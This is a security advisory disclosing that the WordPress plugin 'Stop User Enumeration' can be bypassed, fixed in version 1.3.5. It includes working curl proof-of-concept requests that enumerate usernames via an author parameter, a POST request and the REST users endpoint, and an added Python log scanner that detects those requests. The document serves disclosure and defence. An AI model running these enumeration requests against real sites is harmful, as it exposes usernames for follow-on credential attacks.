Advisory:

Stop User Enumeration does not stop user enumeration

Vulnerability

Traditionally, user enumeration of a WordPress site is done by making a series of requests to /?author=1, /?author=2, /?author=3 and so on (a similar effect can be achieved with POST requests). WordPress 4.7 introduced a REST API endpoint that lists all users.

This plugin attempts to prevent requests with an author parameter (but fails), and makes no attempt to prevent requests to the REST API.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability:

  Score: 5 (Medium)
  Access vector: Network
  Access complexity: Low
  Authentication: None
  Confidentiality impact: Partial
  Integrity impact: None
  Availability impact: None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

There are three ways to bypass this plugin’s protections.

A GET request:

$ curl -i -s 'http://localhost/?wp-comments-post&author=1'
HTTP/1.1 301 Moved Permanently
Date: Fri, 23 Dec 2016 15:38:02 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/7.0.13
Location: http://localhost/author/tomdxw/?wp-comments-post
Content-Length: 0
Content-Type: text/html; charset=UTF-8

A POST request:

$ curl -s http://localhost/?wp-comments-post -d author=1 | grep '<title'
	<title>tomdxw – WP Test</title>

The REST API (new in WordPress 4.7):

$ curl -s http://localhost/wp-json/wp/v2/users
[{"id":1,"name":"tomdxw","url":"","description":"","link":"http:\/\/localhost\/author\/tomdxw\/","slug":"tomdxw","avatar_urls":{"24":"http:\/\/2.gravatar.com\/avatar\/2b5450324939bb3d1352f377950c5503?s=24&d=mm&r=g","48":"http:\/\/2.gravatar.com\/avatar\/2b5450324939bb3d1352f377950c5503?s=48&d=mm&r=g","96":"http:\/\/2.gravatar.com\/avatar\/2b5450324939bb3d1352f377950c5503?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"http:\/\/localhost\/wp-json\/wp\/v2\/users\/1"}],"collection":[{"href":"http:\/\/localhost\/wp-json\/wp\/v2\/users"}]}}]
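A defender-side check, added here as an example and not part of the original advisory: it scans web-server access log lines (constructed below to mirror the three proof-of-concept requests, plus one benign request) and flags each of the three vectors. The log format, IP addresses, function names and indicator labels are assumptions; the ?rest_route= form is the route WordPress accepts when pretty permalinks are disabled.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines (not real logs) mirroring the PoC requests.
SAMPLE_LOG = """\
192.0.2.10 - - [23/Dec/2016:15:38:02 +0000] "GET /?wp-comments-post&author=1 HTTP/1.1" 301 0 "-" "curl/7.50.1"
192.0.2.10 - - [23/Dec/2016:15:38:05 +0000] "POST /?wp-comments-post HTTP/1.1" 200 4210 "-" "curl/7.50.1"
192.0.2.10 - - [23/Dec/2016:15:38:09 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 612 "-" "curl/7.50.1"
192.0.2.11 - - [23/Dec/2016:15:40:00 +0000] "GET /2016/12/hello-world/ HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
192.0.2.10 - - [23/Dec/2016:15:41:00 +0000] "GET /?author=2 HTTP/1.1" 301 0 "-" "curl/7.50.1"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
REST_USERS_RE = re.compile(r"^/wp-json/wp/v2/users(/\d+)?/?$")
REST_ROUTE_RE = re.compile(r"^/wp/v2/users(/\d+)?/?$")


def classify(method, target, status):
    """Return the enumeration indicators for one request ([] if none)."""
    parts = urlsplit(target)
    qs = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    # Vector 1: numeric author parameter. Parse the query string rather than
    # substring-matching the URL, so extra parameters (wp-comments-post in the
    # bypass above) cannot mask it. 301 = redirected to /author/<slug>/, disclosed.
    if any(v.isdigit() for v in qs.get("author", [])):
        findings.append("author-param-disclosed" if status == 301 else "author-param")
    # Vector 2: POST bodies are not logged, so this is only a weaker signal.
    if method == "POST" and "wp-comments-post" in qs:
        findings.append("post-wp-comments-post")
    # Vector 3: REST users collection, as a path or via the ?rest_route= form.
    route = qs.get("rest_route", [""])[0]
    if REST_USERS_RE.match(parts.path) or REST_ROUTE_RE.match(route):
        findings.append("rest-users")
    return findings


def scan(log_text):
    """Return (ip, method, target, findings) for every request flagged above."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            findings = classify(m["method"], m["target"], int(m["status"]))
            if findings:
                hits.append((m["ip"], m["method"], m["target"], findings))
    return hits
```

Run scan(SAMPLE_LOG) to see the four flagged requests; on a real server the same functions can be pointed at the live access log.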

Advisory timeline

  • 2016-12-23: Discovered
  • 2016-12-23: Reported to vendor via info@fullworks.net
  • 2016-12-23: Requested CVE
  • 2016-12-23: Vendor first replied
  • 2017-01-03: Vendor reported issue fixed in version 1.3.5
  • 2017-01-04: Advisory published
  • 2017-08-23: Received CVE

Mitigation/further actions

Upgrade to version 1.3.5 or later.